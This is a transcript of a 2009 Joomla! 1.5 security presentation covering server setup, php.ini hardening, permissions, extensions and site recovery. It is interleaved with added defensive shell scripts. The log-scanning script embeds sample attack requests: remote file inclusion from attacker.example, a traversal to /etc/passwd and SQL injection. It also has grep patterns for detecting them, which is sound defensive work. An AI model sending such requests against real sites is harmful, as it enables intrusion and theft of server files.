Joomladay Netherlands - Security

Joomla! 1.5 Security. Joomla!day Presentation, Utrecht, Netherlands, 12 June 2009

Transcript of Joomladay Netherlands - Security

Page 1: Joomladay Netherlands - Security

Joomla! 1.5 Security

Joomla!day Presentation

Utrecht, Netherlands

12 June 2009

Page 2: Joomladay Netherlands - Security

Is Joomla! safe?

Page 3: Joomladay Netherlands - Security

Is the World Wide Web Safe?

Page 4: Joomladay Netherlands - Security

You know, I don't mean any disrespect, but I had to chuckle at the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the dentist to stop that he says "Yes" or "No" or "What do you want to hear?"

Is Joomla! safe?

Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

Page 5: Joomladay Netherlands - Security


Page 6: Joomladay Netherlands - Security

I would say - anyone who tells a community that a Web site or an out-of-the-box solution is safe is not being responsible. No, it is not "safe" on the Internet.


Page 7: Joomladay Netherlands - Security

What is this presentation about?

Page 8: Joomladay Netherlands - Security

- Getting Started
- Hosting and Server Setup
- Joomla Setup
- Site Administration
- Site Recovery

Presentation overview

Page 9: Joomladay Netherlands - Security


Getting started

Page 10: Joomladay Netherlands - Security


Getting started

Page 11: Joomladay Netherlands - Security


Getting started

Page 12: Joomladay Netherlands - Security

Some basic things before we go into details:
- Report (possible) hacks to the JSST: http://developer.joomla.org/security/contact-the-team.html
- Please don't report hacks or proof-of-concepts out in the open; report them to the JSST instead
- Stay informed! Automatic email notification: http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
- RSS feed: http://feeds.joomla.org/JoomlaSecurityNews


Getting started

Page 13: Joomladay Netherlands - Security


Hosting and server set up

Shared hosting?

Or

Dedicated hosting?

Page 14: Joomladay Netherlands - Security


Hosting and server set up

“register_globals”

“open_basedir”

Page 15: Joomladay Netherlands - Security

Configure Apache:
- Secure important areas with .htaccess
- Use mod_rewrite and mod_security to block PHP attacks

Configure MySQL:
- Implement user accounts with the "need-to-know" principle

Configure PHP:
- Use PHP 5!
- Configure your php.ini file properly (most of the time limited with shared hosts)


Hosting and server set up

Page 16: Joomladay Netherlands - Security

Configure php.ini:
- Use "disable_functions" to disable dangerous PHP functions that are not needed by your site
- Use "open_basedir"
- Don't use "safe_mode" (it gives a false sense of security)
- Don't use "register_globals"
- Don't use "allow_url_fopen". This option enables the URL-aware fopen wrappers that allow accessing URL objects like files.
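The php.ini checks above as a small audit script. This is an added example, not from the slides; it reads a php.ini file and flags the settings the slide names, using a constructed sample file for the demo.

```shell
#!/bin/sh
# Added example, not from the slides: audit a php.ini file for the settings listed above.
# POSIX sh; only uses sed, tail and tr.

# ini_value FILE KEY -> prints the last uncommented value of KEY (quotes stripped), or nothing
ini_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" | tail -n 1 | tr -d '" '
}

# phpini_audit FILE -> prints one WEAK line per finding; exit status = number of findings
phpini_audit() {
    f="$1"; n=0
    # these three should be Off (register_globals and safe_mode were removed in PHP 5.4)
    for key in register_globals safe_mode allow_url_fopen; do
        v=$(ini_value "$f" "$key")
        case "$v" in
            [Oo]n|1|[Tt]rue|[Yy]es) echo "WEAK: $key = $v (set it to Off)"; n=$((n+1)) ;;
        esac
    done
    # open_basedir confines the file access of PHP scripts to the listed paths
    [ -n "$(ini_value "$f" open_basedir)" ] || { echo "WEAK: open_basedir is not set"; n=$((n+1)); }
    # an empty disable_functions leaves exec, system, shell_exec, passthru ... callable
    [ -n "$(ini_value "$f" disable_functions)" ] || { echo "WEAK: disable_functions is empty"; n=$((n+1)); }
    return $n
}

# write_sample_ini FILE -> constructed weak php.ini fragment for the demo (not a real server's)
write_sample_ini() {
    cat > "$1" <<'EOF'
; constructed sample: every setting here is the weak choice
register_globals = On
safe_mode = On
allow_url_fopen = On
;open_basedir = /var/www/site
disable_functions =
EOF
}

# demo: expect five findings
f=$(mktemp)
write_sample_ini "$f"
phpini_audit "$f"
echo "findings: $?"
rm -f "$f"
```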


Page 17: Joomladay Netherlands - Security


Joomla! setup

Page 18: Joomladay Netherlands - Security

Some basic rules to think about:
- Only install official Joomla! versions!
- Change the default administrator username
- Protect directories and files
- Move crucial files outside the public directory: http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
- Ensure that all configurable paths to writable or uploadable directories
- Protect your log directory (move it out of the document root or protect it with .htaccess)
- Adjust file and directory permissions: set critical directories to 755, set file permissions to 644
- Remove unneeded files

Joomla! setup
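The 755/644 rule from the slide above as a check-and-fix script. This is an added example, not from the slides; it runs on a constructed directory tree, and the paths it creates are placeholders.

```shell
#!/bin/sh
# Added example, not from the slides: report and fix entries under a Joomla! web root that
# deviate from the 755 (directories) / 644 (files) baseline. Uses only POSIX find/chmod.

# perm_audit ROOT -> prints "DIR path" / "FILE path" for each entry whose mode is not the baseline
perm_audit() {
    find "$1" -type d ! -perm 755 | sed 's/^/DIR  /'
    find "$1" -type f ! -perm 644 | sed 's/^/FILE /'
}

# perm_audit_count ROOT -> number of deviating entries
perm_audit_count() {
    perm_audit "$1" | wc -l | tr -d ' '
}

# perm_fix ROOT -> apply the baseline. Directories Joomla! must write to (cache, tmp, logs,
# images) should be owned by the web server user rather than opened up to 777.
perm_fix() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# demo on a constructed tree in a temporary directory
d=$(mktemp -d)
mkdir -p "$d/cache" "$d/components/com_content"
touch "$d/index.php" "$d/configuration.php" "$d/cache/x.txt"
chmod 777 "$d/cache"              # the typical "quick fix" after an upload failure
chmod 666 "$d/configuration.php"  # world-writable database credentials
echo "before:"; perm_audit "$d"
perm_fix "$d"
echo "after: $(perm_audit_count "$d") deviations"
rm -rf "$d"
```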

Page 19: Joomladay Netherlands - Security

Before you install extensions:
- Always back up (even on your test system)
- Always test before you install on your live server
- Check for extension vulnerabilities
- Download from trusted sites
- User beware! Check the code quality
- Test! Test! Test!
- Remove junk files (everything that is not needed)
- Avoid encrypted code


Joomla! setup

Page 20: Joomladay Netherlands - Security


Site administration

Page 21: Joomladay Netherlands - Security

- Use well-formed passwords
- Maintain a strong site backup process
- Monitor crack attempts (Tripwire, Samhain)
- Perform manual intrusion detection (manual logfile scan)
- Stay current with security patches and upgrades


Site administration

Page 22: Joomladay Netherlands - Security

- Get help the right way
- Follow a logical and rigorous recovery process
- Reset your administrator password (and those of all admins/super admins)
- Find exploit attempts using the *NIX shell


Site recovery
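The manual logfile scan and "find exploit attempts using the *NIX shell" points from the two slides above, as an added example that is not from the presentation. It greps an Apache combined-format access log for three common probe patterns and ranks the source addresses; the log lines, host names and addresses are constructed.

```shell
#!/bin/sh
# Added example, not from the slides: grep an Apache access log for common web attack patterns
# (remote file inclusion, directory traversal, SQL injection) and rank the source addresses.
# The sample log lines are constructed; extend the patterns to match your own site.

# scan_access_log FILE -> prints each suspicious request, prefixed with the pattern it matched
scan_access_log() {
    f="$1"
    # remote file inclusion: a URL handed to a query parameter, e.g. ...&path=http://host/x.txt
    grep -iE '=(https?|ftp)://' "$f" | sed 's/^/RFI       /'
    # directory traversal, plain or URL-encoded
    grep -iE '(\.\./|%2e%2e)' "$f" | sed 's/^/TRAVERSAL /'
    # SQL injection: UNION SELECT in the request line
    grep -iE 'union(%20|\+| )+select' "$f" | sed 's/^/SQLI      /'
}

# scan_hit_count FILE -> number of flagged requests
scan_hit_count() {
    scan_access_log "$1" | wc -l | tr -d ' '
}

# suspect_ips FILE -> "count ip" lines, most active first (field 2 is the client IP after the tag)
suspect_ips() {
    scan_access_log "$1" | awk '{print $2}' | sort | uniq -c | sort -rn | sed 's/^ *//'
}

# write_sample_log FILE -> constructed combined-format log: two normal hits, three probes
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [12/Jun/2009:10:00:01 +0200] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jun/2009:10:00:02 +0200] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jun/2009:10:01:10 +0200] "GET /index.php?option=com_example&path=http://attacker.example/x.txt HTTP/1.1" 200 311 "-" "libwww-perl/5.8"
198.51.100.7 - - [12/Jun/2009:10:01:11 +0200] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
198.51.100.9 - - [12/Jun/2009:10:02:00 +0200] "GET /index.php?option=com_example&id=1%27%20UNION%20SELECT HTTP/1.1" 500 0 "-" "-"
EOF
}

# demo
f=$(mktemp)
write_sample_log "$f"
scan_access_log "$f"
echo "flagged: $(scan_hit_count "$f")"
suspect_ips "$f"
rm -f "$f"
```

A 200 response to an RFI probe, as in the third sample line, is the case to investigate first: a 404 means the request failed, a 200 means the site answered it.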

Page 23: Joomladay Netherlands - Security


Links

Page 24: Joomladay Netherlands - Security

Documentation wiki: http://docs.joomla.org/Category:Security_Checklist

Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html

Report issues to the JSST: http://developer.joomla.org/security/contact-the-team.html


Links

Page 25: Joomladay Netherlands - Security

Joomla! related

www.joomla.org

developer.joomla.org/security.html

www.secunia.org

www.milw0rm.com

Sites to put RSS feeds on

http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

General

www.us-cert.gov

www.frsirt.com

Operating systems related

www.debian.org/security

www.openbsd.org/security

www.redhat.org/apps/support


Sites to monitor when you take security seriously

Page 26: Joomladay Netherlands - Security


Questions?

Page 27: Joomladay Netherlands - Security